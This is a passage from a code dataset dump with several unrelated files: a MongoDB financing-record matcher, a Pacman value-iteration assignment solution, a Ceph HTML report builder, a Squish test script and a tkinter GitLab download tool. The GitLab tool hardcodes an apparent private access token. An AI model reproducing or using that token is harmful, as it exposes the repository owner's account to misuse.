ret_dict.append({\n            'id': task['id'],\n            'name': task['name'],\n            'status': task['status'],\n            'start_date': str(task['start_date']),\n            'end_date': str(task['end_date']),\n            'duration': task['duration'],\n            'net_duration': task['net_duration'],\n            'owner': [child_task['owner'] for child_task in Task.objects.filter(name=task['name']).values('owner')],\n\n        })\n\n    return HttpResponse(json.dumps(ret_dict))\n","sub_path":"task_list/webapi/task_listjson.py","file_name":"task_listjson.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"578297689","text":"# _*_ coding: utf-8 _*_\r\n\"\"\"\r\nauthor: tongxiao\r\ndate: 2016-11-01\r\ndescription: 融资数据匹配eid\r\n\"\"\"\r\n\r\n\r\nfrom src.head import *\r\n\r\n\r\nclass FinancesPrePlugin01:\r\n\r\n    def __init__(self):\r\n        pass\r\n\r\n    def __call__(self):\r\n        pass\r\n\r\n    def __generate_hist_name_for_query(self, inname_text):\r\n        \"\"\"\r\n        遍历历史名称查询\r\n        :param inname_text:\r\n        :return:\r\n        \"\"\"\r\n        logging.debug(\"{0}.__generate_hist_name_for_query 
starting...\".format(self.__class__.__name__))\r\n item_list = [\"(\", \"(\", \")\", \")\", u\"(\", u\"(\", u\")\", u\")\"]\r\n status = 0\r\n for item in item_list:\r\n if item in inname_text:\r\n status = 1\r\n break\r\n if status == 1:\r\n result = (\r\n '(history_names:\"{0}\" OR history_names:\"{1}\" OR history_names:\"{2}\" OR history_names:\"{3}\" '\r\n 'OR history_names:\"{4}\" OR history_names:\"{5}\" OR history_names:\"{6}\")'\r\n ).format(\r\n inname_text,\r\n inname_text.replace(\"(\", \"(\").replace(u\"(\", u\"(\"),\r\n inname_text.replace(\")\", \")\").replace(u\")\", u\")\"),\r\n inname_text.replace(\"(\", \"(\").replace(u\"(\", u\"(\"),\r\n inname_text.replace(\")\", \")\").replace(u\")\", u\")\"),\r\n inname_text.replace(\"(\", \"(\").replace(\")\", \")\").replace(u\"(\", u\"(\").replace(u\")\", u\")\"),\r\n inname_text.replace(\"(\", \"(\").replace(\")\", \")\").replace(u\"(\", u\"(\").replace(u\")\", u\")\")\r\n )\r\n else:\r\n result = 'history_names:\"{0}\"'.format(inname_text)\r\n logging.debug(\"{0}.__generate_hist_name_for_query end.\".format(self.__class__.__name__))\r\n return result\r\n\r\n def __trim_char(self, content):\r\n \"\"\"\r\n 清空文中的空格及换行符\r\n :param content:\r\n :return:\r\n \"\"\"\r\n logging.debug(\"{0}.__trim_char starting...\".format(self.__class__.__name__))\r\n keywords = [\" \", \" \", \" \", \" \", \"\\r\", \"\\n\", \"\\t\", u\" \", u\" \", u\" \", u\" \", u\"\\r\", u\"\\n\", u\"\\t\"]\r\n for key in keywords:\r\n content = content.replace(key, \"\")\r\n logging.debug(\"{0}.__trim_char end.\".format(self.__class__.__name__))\r\n return content.strip()\r\n\r\n def __trim_brackets(self, content):\r\n \"\"\"\r\n 清空文中所有的括号\r\n :param content:\r\n :return:\r\n \"\"\"\r\n logging.debug(\"{0}.__trim_brackets starting...\".format(self.__class__.__name__))\r\n keywords = [\r\n \"(\", \")\", \"<\", \">\", \"[\", \"]\", \"{\", \"}\", \"《\", \"》\", \"【\", \"】\", \"(\", \")\", \"[\", \"]\", \"〔\", \"〕\",\r\n \"/\", \"/\", u\"(\", u\")\", u\"<\", u\">\", u\"[\", u\"]\", u\"{\", u\"}\", u\"《\", u\"》\", u\"【\", u\"】\", u\"(\", u\")\",\r\n u\"[\", u\"]\", u\"〔\", u\"〕\", u\"/\", u\"/\"\r\n ]\r\n for key in keywords:\r\n content = content.replace(key, \"\")\r\n logging.debug(\"{0}.__trim_brackets end.\".format(self.__class__.__name__))\r\n return content.strip()\r\n\r\n def __is_in_history_names(self, ename, history_names_str):\r\n \"\"\"\r\n 检查ename是否是历史名称\r\n :param ename:\r\n :param history_names_str:\r\n :return:\r\n \"\"\"\r\n logging.debug(\"{0}.__is_in_history_names starting...\".format(self.__class__.__name__))\r\n result = False\r\n hist_name_list = history_names_str.split(\" \")\r\n for hist_name in hist_name_list:\r\n name_a = self.__trim_char(self.__trim_brackets(ename))\r\n name_b = self.__trim_char(self.__trim_brackets(hist_name))\r\n if name_a == name_b:\r\n result = True\r\n break\r\n logging.debug(\"{0}.__is_in_history_names end.\".format(self.__class__.__name__))\r\n return result\r\n\r\n def __find_ent(self, ename):\r\n \"\"\"\r\n 根据企业名查找数据库数据\r\n :param ename:\r\n :return:\r\n \"\"\"\r\n logging.debug(\"{0}.__find_ent starting...\".format(self.__class__.__name__))\r\n db_result = MongoDBDAO.find_one(\"GS\", \"enterprises\", {\"name\": ename})\r\n if db_result is None:\r\n if \"(\" in ename:\r\n temp_name = ename.replace(\"(\", \"(\").replace(\")\", \")\").replace(u\"(\", u\"(\").replace(u\")\", u\")\")\r\n db_result = MongoDBDAO.find_one(\"GS\", \"enterprises\", {\"name\": temp_name})\r\n # 左英文,右中文\r\n if db_result is None:\r\n temp_name = 
ename.replace(\")\", \")\").replace(u\")\", u\")\")\r\n db_result = MongoDBDAO.find_one(\"GS\", \"enterprises\", {\"name\": temp_name})\r\n # 左中文,右英文\r\n if db_result is None:\r\n temp_name = ename.replace(\"(\", \"(\").replace(\")\", \")\").replace(\")\", \")\").replace(u\"(\", u\"(\")\\\r\n .replace(u\")\", u\")\").replace(u\")\", u\")\")\r\n db_result = MongoDBDAO.find_one(\"GS\", \"enterprises\", {\"name\": temp_name})\r\n elif \"(\" in ename:\r\n temp_name = ename.replace(\"(\", \"(\").replace(\")\", \")\").replace(u\"(\", u\"(\").replace(u\")\", u\")\")\r\n db_result = MongoDBDAO.find_one(\"GS\", \"enterprises\", {\"name\": temp_name})\r\n # 左中文,右英文\r\n if db_result is None:\r\n temp_name = ename.replace(\")\", \")\").replace(u\")\", u\")\")\r\n db_result = MongoDBDAO.find_one(\"GS\", \"enterprises\", {\"name\": temp_name})\r\n # 左英文,右中文\r\n if db_result is None:\r\n temp_name = ename.replace(\"(\", \"(\").replace(\")\", \")\").replace(\"(\", \"(\").replace(u\"(\", u\"(\")\\\r\n .replace(u\")\", u\")\").replace(u\"(\", u\"(\")\r\n db_result = MongoDBDAO.find_one(\"GS\", \"enterprises\", {\"name\": temp_name})\r\n # 按历史名称查\r\n if db_result is None:\r\n search_count = 0\r\n ops_result = {}\r\n while search_count < 3:\r\n search_count += 1\r\n ops_result = AliOpenSearch.search(\r\n CONFIG_OPS_COMMON[\"index_name\"],\r\n # \"u_source:'9' AND {0}&&sort=reg_capi\".format(self.__generate_hist_name_for_query(ename))\r\n \"{0}&&sort=reg_capi\".format(self.__generate_hist_name_for_query(ename))\r\n )\r\n if ops_result[\"status\"] != \"OK\":\r\n time.sleep(0.1)\r\n continue\r\n else:\r\n break\r\n if ops_result[\"status\"] == \"OK\" and ops_result[\"result\"][\"num\"] > 0:\r\n hist_last_update_date = \"\"\r\n for item in ops_result[\"result\"][\"items\"]:\r\n status01 = not CommonUtils.is_str_empty_or_null(item[\"id\"])\r\n status02 = self.__is_in_history_names(ename,item[\"history_names\"])\r\n status03 = item[\"last_update_date\"] > hist_last_update_date\r\n if status01 and status02 and status03:\r\n history_id = item[\"id\"]\r\n hist_last_update_date = item[\"last_update_date\"]\r\n db_result = {\"eid\": history_id}\r\n logging.debug(\"{0}.__find_ent end.\".format(self.__class__.__name__))\r\n return db_result\r\n\r\n def __reset_db_records(self, db_records, data_instance, eid):\r\n \"\"\"\r\n 重置数据库数据\r\n :param db_records:\r\n :param data_instance:\r\n :param eid:\r\n :return:\r\n \"\"\"\r\n logging.debug(\"{0}.__reset_db_records starting...\".format(self.__class__.__name__))\r\n be_chosen = False\r\n try:\r\n data_md5_index = data_instance.dict.get(\"md5_index\")\r\n\r\n # 筛选融资轮次最多的数据\r\n chosen_record = None\r\n for db_record in db_records:\r\n finance_size = len(db_record.get(\"finances\", [])) + len(db_record.get(\"acquisition\", []))\r\n logging.debug(\"{0}.finance_size: {1}\".format(eid, finance_size))\r\n compared_size = 0\r\n if chosen_record:\r\n compared_size = len(chosen_record.get(\"finances\", [])) + len(chosen_record.get(\"acquisition\", []))\r\n logging.debug(\"{0}.compared_size: {1}\".format(eid, compared_size))\r\n if finance_size >= compared_size:\r\n chosen_record = db_record\r\n\r\n logging.debug(\"{0} chosen_record: {1}\".format(eid, chosen_record))\r\n if chosen_record:\r\n logging.debug(\"{0} chosen record md5_index: {1}\".format(eid, chosen_record.get(\"md5_index\")))\r\n # 判断当前数据是否是融资轮次最多的\r\n if chosen_record.get(\"md5_index\") == data_md5_index:\r\n be_chosen = True\r\n\r\n # 将融资轮次较少的数据的eid置为空\r\n for record in db_records:\r\n if record.get(\"md5_index\") != 
chosen_record.get(\"md5_index\"):\r\n logging.debug(\"I'll set eid({0}) null({1})\".format(eid, record.get(\"md5_index\")))\r\n db_query = {\"md5_index\": record[\"md5_index\"]}\r\n update_data = {\r\n \"$set\": {\"eid\": \"\"},\r\n \"$setOnInsert\": {\"created_time\": datetime.datetime.utcnow()}\r\n }\r\n MongoDBDAO.update_one(\"GS\", \"juziit_finances\", db_query, update_data)\r\n except Exception as e:\r\n logging.exception(\"__reset_db_records error!\")\r\n logging.debug(\"{0}.__reset_db_records end.\".format(self.__class__.__name__))\r\n return be_chosen\r\n\r\n def __get_finance_date(self, finances):\r\n \"\"\"\r\n 获取融资状态\r\n :param finances:\r\n :return:\r\n \"\"\"\r\n logging.debug(\"{0}.__get_finance_date starting...\".format(self.__class__.__name__))\r\n finance_date = \"0000-00-00\"\r\n try:\r\n for finance in finances:\r\n if finance.get(\"date\", \"\") > finance_date:\r\n finance_date = finance[\"date\"]\r\n except Exception as e:\r\n logging.exception(\"__get_finance_date error!\")\r\n logging.debug(\"{0}.__get_finance_date end.\".format(self.__class__.__name__))\r\n return finance_date\r\n\r\n def __build_related_company(self, data_instance):\r\n \"\"\"\r\n 匹配eid\r\n :param data_instance:\r\n :return:\r\n \"\"\"\r\n logging.debug(\"{0}.__build_related_company starting...\".format(self.__class__.__name__))\r\n try:\r\n # 获取企业对应的eid\r\n eid = \"\"\r\n if data_instance.dict.get(\"company\"):\r\n db_result = self.__find_ent(data_instance.dict[\"company\"])\r\n if db_result:\r\n eid = db_result[\"eid\"]\r\n\r\n # 查找eid对应的数据\r\n count = 0\r\n db_records = list()\r\n logging.debug(\"{0}.eid: ({1})\".format(self.__class__.__name__, eid))\r\n if len(eid)>0:\r\n db_query = {\"eid\": eid}\r\n db_result = MongoDBDAO.find(\"GS\", \"juziit_finances\", db_query)\r\n if db_result:\r\n for db_record in db_result:\r\n count += 1\r\n db_records.append(db_record)\r\n\r\n # 处理eid对应的多条数据\r\n be_chosen = True\r\n logging.debug(\"{0}.eid({1}).count: ({2})\".format(self.__class__.__name__, eid, count))\r\n if count > 1:\r\n be_chosen = self.__reset_db_records(db_records, data_instance, eid)\r\n elif count == 1:\r\n if data_instance.dict[\"md5_index\"] != db_records[0][\"md5_index\"]:\r\n data_finance_date = self.__get_finance_date(\r\n data_instance.dict.get(\"finances\", []) + data_instance.dict.get(\"acquisition\", []))\r\n db_finance_date = self.__get_finance_date(\r\n db_records[0].get(\"finances\", []) + db_records[0].get(\"acquisition\", [])\r\n )\r\n if data_finance_date <= db_finance_date:\r\n be_chosen = False\r\n else:\r\n db_query = {\"md5_index\": db_records[0][\"md5_index\"]}\r\n update_data = {\r\n \"$set\": {\"eid\": \"\"},\r\n \"$setOnInsert\": {\"created_time\": datetime.datetime.utcnow()}\r\n }\r\n MongoDBDAO.update_one(\"GS\", \"juziit_finances\", db_query, update_data)\r\n\r\n # data_finance_size = len(data_instance.dict.get(\"finances\", [])) + len(data_instance.dict.get(\"acquisition\", []))\r\n # db_finance_size = len(db_records[0].get(\"finances\", [])) + len(db_records[0].get(\"acquisition\", []))\r\n # if data_finance_size <= db_finance_size:\r\n # be_chosen = False\r\n # else:\r\n # db_query = {\"md5_index\": db_records[0][\"md5_index\"]}\r\n # update_data = {\r\n # \"$set\": {\"eid\": \"\"},\r\n # \"$setOnInsert\": {\"created_time\": datetime.datetime.utcnow()}\r\n # }\r\n # MongoDBDAO.update_one(\"GS\", \"juziit_finances\", db_query, update_data)\r\n\r\n # 给eid赋值\r\n if be_chosen:\r\n logging.debug(\"finally, I'll set {0}'s eid 
{1}\".format(data_instance.dict[\"md5_index\"], eid))\r\n data_instance.dict[\"eid\"] = eid\r\n else:\r\n data_instance.dict[\"eid\"] = \"\"\r\n except Exception as e:\r\n logging.exception(\"__build_related_company error!\")\r\n logging.debug(\"{0}.__build_related_company end.\".format(self.__class__.__name__))\r\n return\r\n\r\n def process(self, data_instance):\r\n \"\"\"\r\n 接口函数\r\n :param data_instance:\r\n :return:\r\n \"\"\"\r\n logging.debug(\"{0}.process starting...\".format(self.__class__.__name__))\r\n if isinstance(data_instance.dict, list):\r\n data_instance.dict = data_instance.dict[0]\r\n if \"content\" in data_instance.dict.keys():\r\n return\r\n self.__build_related_company(data_instance)\r\n logging.debug(\"{0}.process starting...\".format(self.__class__.__name__))\r\n","sub_path":"source/src/plugins/Finances/FinancesPrePlugin01.py","file_name":"FinancesPrePlugin01.py","file_ext":"py","file_size_in_byte":14577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"565074500","text":"# valueIterationAgents.py\r\n# -----------------------\r\n# Licensing Information: You are free to use or extend these projects for\r\n# educational purposes provided that (1) you do not distribute or publish\r\n# solutions, (2) you retain this notice, and (3) you provide clear\r\n# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.\r\n# \r\n# Attribution Information: The Pacman AI projects were developed at UC Berkeley.\r\n# The core projects and autograders were primarily created by John DeNero\r\n# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\r\n# Student side autograding was added by Brad Miller, Nick Hay, and\r\n# Pieter Abbeel (pabbeel@cs.berkeley.edu).\r\n\r\n\r\nimport mdp, util\r\n\r\nfrom learningAgents import ValueEstimationAgent\r\n\r\nclass ValueIterationAgent(ValueEstimationAgent):\r\n \"\"\"\r\n * Please read learningAgents.py before reading this.*\r\n\r\n A ValueIterationAgent takes a Markov decision process\r\n (see mdp.py) on initialization and runs value iteration\r\n for a given number of iterations using the supplied\r\n discount factor.\r\n \"\"\"\r\n def __init__(self, mdp, discount = 0.9, iterations = 100):\r\n \"\"\"\r\n Your value iteration agent should take an mdp on\r\n construction, run the indicated number of iterations\r\n and then act according to the resulting policy.\r\n\r\n Some useful mdp methods you will use:\r\n mdp.getStates()\r\n mdp.getPossibleActions(state)\r\n mdp.getTransitionStatesAndProbs(state, action)\r\n mdp.getReward(state, action, nextState)\r\n mdp.isTerminal(state)\r\n \"\"\"\r\n self.mdp = mdp\r\n self.discount = discount\r\n self.iterations = iterations\r\n self.values = util.Counter() # A Counter is a dict with default 0\r\n\r\n self.mdp = mdp\r\n self.discount = discount\r\n self.iterations = iterations\r\n self.values = util.Counter() # A Counter is a dict with default 0\r\n\r\n #print self.mdp.getStates()\r\n\r\n #for s in self.mdp.getStates():\r\n #print self.values[s]\r\n\r\n state_qval = 0\r\n for i in range(iterations):\r\n valuesCopy = self.values.copy()\r\n for s in self.mdp.getStates():\r\n #state_qval = self.values[s]\r\n state_qval = None\r\n qval_temp = None\r\n for a in self.mdp.getPossibleActions(s):\r\n qval_temp = self.computeQValueFromValues(s,a)\r\n #print 'Hello'\r\n #print self.getTransitionStatesAndProbs(s,a)\r\n if (state_qval == None) or (qval_temp > state_qval):\r\n state_qval = qval_temp\r\n if qval_temp == None:\r\n 
state_qval = 0\r\n                #self.values[s] = state_qval\r\n                valuesCopy[s] = state_qval\r\n            self.values = valuesCopy\r\n\r\n\r\n    def getValue(self, state):\r\n        \"\"\"\r\n          Return the value of the state (computed in __init__).\r\n        \"\"\"\r\n        return self.values[state]\r\n\r\n\r\n    def computeQValueFromValues(self, state, action):\r\n        \"\"\"\r\n          Compute the Q-value of action in state from the\r\n          value function stored in self.values.\r\n        \"\"\"\r\n        final_qval = 0\r\n        # sum transition probability * (reward + discounted successor value) over all successors\r\n        for next_state, prob in self.mdp.getTransitionStatesAndProbs(state, action):\r\n            final_qval += prob * (self.mdp.getReward(state, action, next_state) + self.discount * self.values[next_state])\r\n\r\n        return final_qval\r\n\r\n    def computeActionFromValues(self, state):\r\n        \"\"\"\r\n          The policy is the best action in the given state\r\n          according to the values currently stored in self.values.\r\n\r\n          You may break ties any way you see fit. Note that if\r\n          there are no legal actions, which is the case at the\r\n          terminal state, you should return None.\r\n        \"\"\"\r\n        actions = self.mdp.getPossibleActions(state)\r\n\r\n        if len(actions) == 0:\r\n            return None\r\n\r\n        # track the best Q-value seen so far; a None sentinel also handles negative Q-values\r\n        max_action = None\r\n        final_action = None\r\n        for action in actions:\r\n            final_qval = self.computeQValueFromValues(state,action)\r\n            if max_action is None or final_qval > max_action:\r\n                max_action = final_qval\r\n                final_action = action\r\n\r\n        return final_action\r\n\r\n    def getPolicy(self, state):\r\n        return self.computeActionFromValues(state)\r\n\r\n    def getAction(self, state):\r\n        \"Returns the policy at the state (no exploration).\"\r\n        return self.computeActionFromValues(state)\r\n\r\n    def getQValue(self, state, action):\r\n        return self.computeQValueFromValues(state, action)\r\n","sub_path":"Lab/lab12/valueIterationAgents.py","file_name":"valueIterationAgents.py","file_ext":"py","file_size_in_byte":4993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"363831029","text":"import shutil\nimport logging\nimport urllib.request\nfrom pathlib import Path\nfrom urllib.error import URLError\nfrom typing import Optional, List, Any, Tuple\n\nlogger = logging.getLogger('report')\n\nfrom . 
import html\n\n\nclass Report:\n def __init__(self, cluster_name: str, output_file_name: str) -> None:\n self.cluster_name = cluster_name\n self.output_file_name = output_file_name\n self.style: List[str] = []\n self.style_links: List[str] = []\n self.script_links: List[str] = []\n self.scripts: List[str] = []\n self.divs: List[Tuple[str, Optional[str], Optional[str], str]] = []\n self.onload: List[str] = [\"onHashChanged()\"]\n\n def add_block(self, name: str, header: Optional[str], block_obj: Any, menu_item: str = None):\n if menu_item is None:\n menu_item = header\n self.divs.append((name, header, menu_item, str(block_obj)))\n\n def insert_js_css(self, link: str, embed: bool, static_files_dir: Path, output_dir: Path) -> Tuple[bool, str]:\n def get_path(link: str) -> Tuple[bool, str]:\n if link.startswith(\"http://\") or link.startswith(\"https://\"):\n return False, link\n fname = link.rsplit('/', 1)[-1]\n return True, str(static_files_dir / fname)\n\n local, fname = get_path(link)\n data = None\n\n if local:\n if embed:\n data = open(fname, 'rb').read().decode(\"utf8\")\n else:\n shutil.copyfile(fname, output_dir / Path(fname).name)\n else:\n try:\n data = urllib.request.urlopen(fname, timeout=10).read().decode(\"utf8\")\n except (TimeoutError, URLError):\n logger.warning(f\"Can't retrieve {fname}\")\n\n if data is not None:\n return True, data\n else:\n return False, link\n\n def make_body(self, embed: bool, output_dir: Path, static_files_dir) -> html.Doc:\n self.style_links.append(\"bootstrap.min.css\")\n self.style_links.append(\"report.css\")\n self.script_links.append(\"report.js\")\n self.script_links.append(\"sorttable_utf.js\")\n\n links: List[str] = []\n\n for link in self.style_links + self.script_links:\n is_data, link_or_data = self.insert_js_css(link, embed, static_files_dir, output_dir)\n if is_data:\n if link in self.style_links:\n self.style.append(link_or_data)\n else:\n self.scripts.append(link_or_data)\n else:\n links.append(link_or_data)\n\n css_links = links[:len(self.style_links)]\n js_links = links[len(self.style_links):]\n\n doc = html.Doc()\n with doc.html:\n with doc.head:\n doc.title(\"Ceph cluster report: \" + self.cluster_name)\n\n for url in css_links:\n doc.link(href=url, rel=\"stylesheet\", type=\"text/css\")\n\n if self.style:\n doc.style(\"\\n\".join(self.style), type=\"text/css\")\n\n for url in js_links:\n doc.script(type=\"text/javascript\", src=url)\n\n onload = \" \" + \";\\n \".join(self.onload)\n self.scripts.append(f'function onload(){{\\n{onload};\\n}}')\n code = \";\\n\".join(self.scripts)\n\n if embed:\n doc.script(code, type=\"text/javascript\")\n else:\n (output_dir / \"onload.js\").open(\"w\").write(code)\n doc.script(type=\"text/javascript\", src=\"onload.js\")\n with doc.body(onload=\"onload()\"):\n with doc.div(_class=\"menu-ceph\"):\n with doc.ul():\n for idx, div in enumerate(self.divs):\n if div is not None:\n name, _, menu, _ = div\n if menu:\n if menu.endswith(\":\"):\n menu = menu[:-1]\n doc.li.span(menu,\n _class=\"menulink\",\n onclick=f\"clicked('{name}')\",\n id=f\"ptr_{name}\")\n\n for div in self.divs:\n doc(\"\\n\")\n if div is not None:\n name, header, menu_item, block = div\n with doc.div(_class=\"data-ceph\", id=name):\n if header is None:\n doc(block)\n else:\n doc.H3.center(header)\n doc.br\n\n if block != \"\":\n doc.center(block)\n return doc\n\n def save_to(self, output_dir: Path, pretty_html: bool = False,\n embed: bool = False, encrypt: str = None):\n\n static_files_dir = Path(__file__).absolute().parent.parent / 
\"html_js_css\"\n doc = self.make_body(embed, output_dir, static_files_dir)\n\n if encrypt:\n assert embed\n body_s = str(doc) + \" \"\n if len(body_s) % 32:\n body_s += \" \" * (32 - len(body_s) % 32)\n\n import os\n import base64\n from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\n from cryptography.hazmat.backends import default_backend\n\n backend = default_backend()\n iv = os.urandom(16)\n cipher = Cipher(algorithms.AES(encrypt), modes.CBC(iv), backend=backend)\n encryptor = cipher.encryptor()\n encrypted_body = iv + encryptor.update(body_s.encode(\"utf8\")) + encryptor.finalize()\n encrypted_body_base64 = base64.b64encode(encrypted_body)\n\n step = 128\n header = 'encrypted = \"'\n idx = step - len(header)\n header += encrypted_body_base64[0: idx] + '\"'\n parts = [header]\n while idx < len(encrypted_body_base64):\n parts.append(' + \"' + encrypted_body_base64[idx: idx + step] + '\"')\n idx += step\n\n enc_code = \" \\\\\\n \".join(parts)\n doc = html.Doc()\n _, link_or_data = self.insert_js_css(\"aesjs.js\", embed, static_files_dir, output_dir)\n\n with doc.head:\n doc.script(type=\"text/javascript\", src=link_or_data)\n doc.script(type=\"text/javascript\")(enc_code)\n\n with doc.body.center:\n doc('Report encrypted, to encrypt enter password and press \"decrypt\": ')\n doc.input(type=\"password\", id=\"password\")\n doc.input(type=\"button\",\n onclick=\"decode(document.getElementById('password').value)\",\n value=\"Decrypt\")\n\n index = f\"<!doctype html>{doc}\"\n index_path = output_dir / self.output_file_name\n try:\n if pretty_html:\n from bs4 import BeautifulSoup\n index = BeautifulSoup.BeautifulSoup(index).prettify()\n except:\n pass\n index_path.open(\"w\").write(index)\n\n","sub_path":"ceph_monitoring/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":7275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"450719528","text":"import glob, os\nimport csv\nfrom random import randint\nimport random\nimport __builtin__\nimport datetime\nimport json\nfrom pprint import pprint\nimport shutil\nimport string\nimport xdrlib\nimport codecs\nfrom distutils.util import strtobool\n\n\ndef main():\n result = False\n with codecs.open('C:\\gitworkspace\\TestAutomation-AKCC5XX\\Test_Automation\\SourceCode\\Dependent_Files\\Latest_CDF\\device.jso',encoding='utf-8') as data_file:\n content = data_file.read()\n content = content.replace(u'\\ufeff','') \n data = json.loads(content)\n Parameter_Count = len(data[\"Parameters\"])\n \n x = \"(RuleId == 23) return GetVar(189) != 6 && GetVar(189) != 7 && GetVar(138) == 1 && ((GetVar(199) == 7) || (GetVar(200) == 7) || (GetVar(201) == 7))\"\n myItem = \"RuleId\"\n if myItem in x:\n array_1 = []\n for y in x.split('return'):\n if \"RuleId\" in y: \n Id = ''.join(filter(lambda x: x.isdigit(),y))\n \n if \"GetVar\" in y:\n visibleText= \"\"\n y = y.replace(\";\", \"\")\n for z in y.split(\" \"):\n if \"GetVar(\" in z:\n Rule = z.replace(\"GetVar(\", \"\").replace(\")\", \"\")\n \n if \"(\" in Rule:\n test.log(\"IF \"+str(Rule))\n Rule = Rule.replace(\"(\", \"\")\n test.log(\"IF2 \"+str(Rule))\n for i in range (0, Parameter_Count):\n Rule_Idx = data[\"Parameters\"][i][\"Idx\"]\n if (Rule == str(Rule_Idx)):\n Rule_Idx_ID = data[\"Parameters\"][Rule_Idx][\"UniqueID\"]\n visibleText += \"(Id_\"+str(Rule_Idx_ID)+\" \"\n \n \n else:\n test.log(\"ELSE \"+str(Rule))\n for i in range (0, Parameter_Count):\n Rule_Idx = data[\"Parameters\"][i][\"Idx\"]\n if (Rule 
== str(Rule_Idx)):\n Rule_Idx_ID = data[\"Parameters\"][Rule_Idx][\"UniqueID\"]\n visibleText += \"Id_\"+str(Rule_Idx_ID)+\" \"\n \n else:\n visibleText += z+\" \"\n \n ","sub_path":"suite_AK-CC55 Multi coil/In Progress/tst_Visibility_Error_Checking/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"240745290","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/5/16 19:33\n# @Author : zzt\n# @File : fifth.py\n\nimport datetime\nimport os\nimport sys\nimport tkinter as tk\nfrom tkinter import messagebox\nfrom tkinter import ttk\nimport time\nimport threading\n\nimport gitlab\nimport gitlab.v4.objects\n\nfrom page.topUiExcel import GitTopUiInfo\n\n\ndef get_now_time():\n return datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d %H:%M:%S')\n\n\nPROJECT_INFO = {\n # \"篮球大师\": ['http://git.wckj.com/', \"Pf7-ssZdX9PE2xpmXg7n\", 37],\n # \"足球大师\": ['http://git.wckj.com/', \"Pf7-ssZdX9PE2xpmXg7n\", 16],\n \"最佳11人\": ['http://git.wckj.com/', \"Pf7-ssZdX9PE2xpmXg7n\", 83],\n}\n\n\nclass SixthPage(object):\n\n def __init__(self, parent):\n self.parent = parent\n self._branches = {}\n self._client = ''\n self.target_branche = ''\n self._master_name = \"master\"\n self.filters = [\"Merge branch\", \"Lua\"]\n self.target_branche_create_time = \"2020-03-13\"\n self.specify_folder = \"Assets/StaticData\"\n self.target_info = []\n self.create_buttons()\n\n def create_buttons(self):\n self.parent.pack_propagate(0)\n f0 = tk.Frame(self.parent, height=50, width=107)\n # f0.pack(anchor=tk.N, expand=True)\n f0.pack(anchor=tk.N)\n # 添加选择服务器下拉按钮\n com1 = ttk.Combobox(f0, state='readonly')\n com1.bind(\"<<ComboboxSelected>>\", lambda *args: self.choose_project(com1, com2, ''))\n com1.set(' 选 择 项 目')\n com1['values'] = list(PROJECT_INFO.keys())\n com1.grid(row=0, column=0, padx=5, pady=3)\n # 添加选择数据库下拉按钮\n com2 = ttk.Combobox(f0, state='readonly', width=26)\n com2.bind(\"<<ComboboxSelected>>\", lambda *args: self.choose_branch(com2))\n com2.set(' 选 择 分 支')\n com2.grid(row=0, column=1, padx=5, pady=3)\n but1 = tk.Button(f0, text='下载静态文件夹', width=18, height=2, command=lambda: self.button_download_target_files())\n but1.grid(row=0, column=2, padx=5, pady=3)\n # lf_2 = tk.LabelFrame(f0, text='可选')\n # lf_2.grid(row=1, column=0, columnspan=2, pady=3, padx=5)\n # but1 = tk.Button(f0, text='开 始 检 查', width=18, height=2, command=lambda: self.button_check_git())\n # but1.grid(row=0, column=2, padx=5, pady=3)\n # but2 = tk.Button(f0, text='打 印 差 异', width=18, height=2, command=lambda: self.button_download())\n # but2.grid(row=1, column=2, padx=5, pady=3)\n # tk.Label(lf_2, text=\"分支创建时间: \").grid(row=1, column=0, padx=5, pady=3)\n # ent1 = tk.StringVar()\n # tk.Entry(lf_2, text=\"2020-12-25\", textvariable=ent1, width=26).grid(row=1, column=1, padx=5, pady=3)\n # tk.Button(lf_2, text=\"修改创建时间\", width=10, command=lambda: self.change_date(ent1)).grid(row=1, column=2, padx=5,\n # pady=3)\n #\n # ent1.set(self.target_branche_create_time)\n # tk.Label(lf_2, text=\"过滤条件: \").grid(row=2, column=0, padx=5, pady=3)\n # ent2 = tk.StringVar()\n # tk.Entry(lf_2, text=\"Merge branch, Lua\", textvariable=ent2, width=26).grid(row=2, column=1, padx=5, pady=3)\n # tk.Button(lf_2, text=\"修改过滤条件\", width=10, command=lambda: self.change_filter(ent2)).grid(row=2, column=2, padx=5,\n # pady=3)\n # com3 = ttk.Combobox(lf_2, state='readonly', width=26)\n # com3.bind(\"<<ComboboxSelected>>\", lambda *args: 
self.choose_branch_3(com3))\n # com3.set(' 选择目标分支(默认master)')\n # com3.grid(row=3, column=1, padx=5, pady=3)\n #\n # ent2.set(\"Merge branch, Lua\")\n # 日志文本\n labelf = tk.LabelFrame(self.parent, text='日志文本:')\n labelf.pack(anchor=tk.N, expand=True)\n sb = tk.Scrollbar(labelf)\n sb.pack(side=tk.RIGHT, fill=tk.Y)\n self.tex = tk.Text(labelf, height=28, yscrollcommand=sb.set, width=107)\n self.tex.pack(side=tk.LEFT, fill=tk.BOTH)\n sb.config(command=self.tex.yview)\n self.tex.tag_config('tag1', foreground='green')\n self.tex.tag_config('tag2', foreground='red')\n # 添加其他按钮\n tk.Button(self.parent, text='保存日志', command=lambda: self.save_log(self.tex), width=15).pack(anchor=tk.S,\n side=tk.RIGHT,\n padx=3, pady=3)\n tk.Button(self.parent, text='清除日志', command=lambda: self.tex.delete(1.0, tk.END)).pack(anchor=tk.S,\n side=tk.RIGHT, padx=5,\n pady=3)\n\n def button_download_target_files(self):\n start_time = time.time()\n folder = self._project.repository_tree(self.specify_folder)\n first_directory = os.getcwd() + '\\客户端静态文件'\n if not os.path.exists(first_directory):\n os.mkdir(first_directory)\n filename = ''.join([first_directory, '\\\\', get_now_time().replace(':', '_').replace(' ', '_')])\n os.mkdir(filename)\n 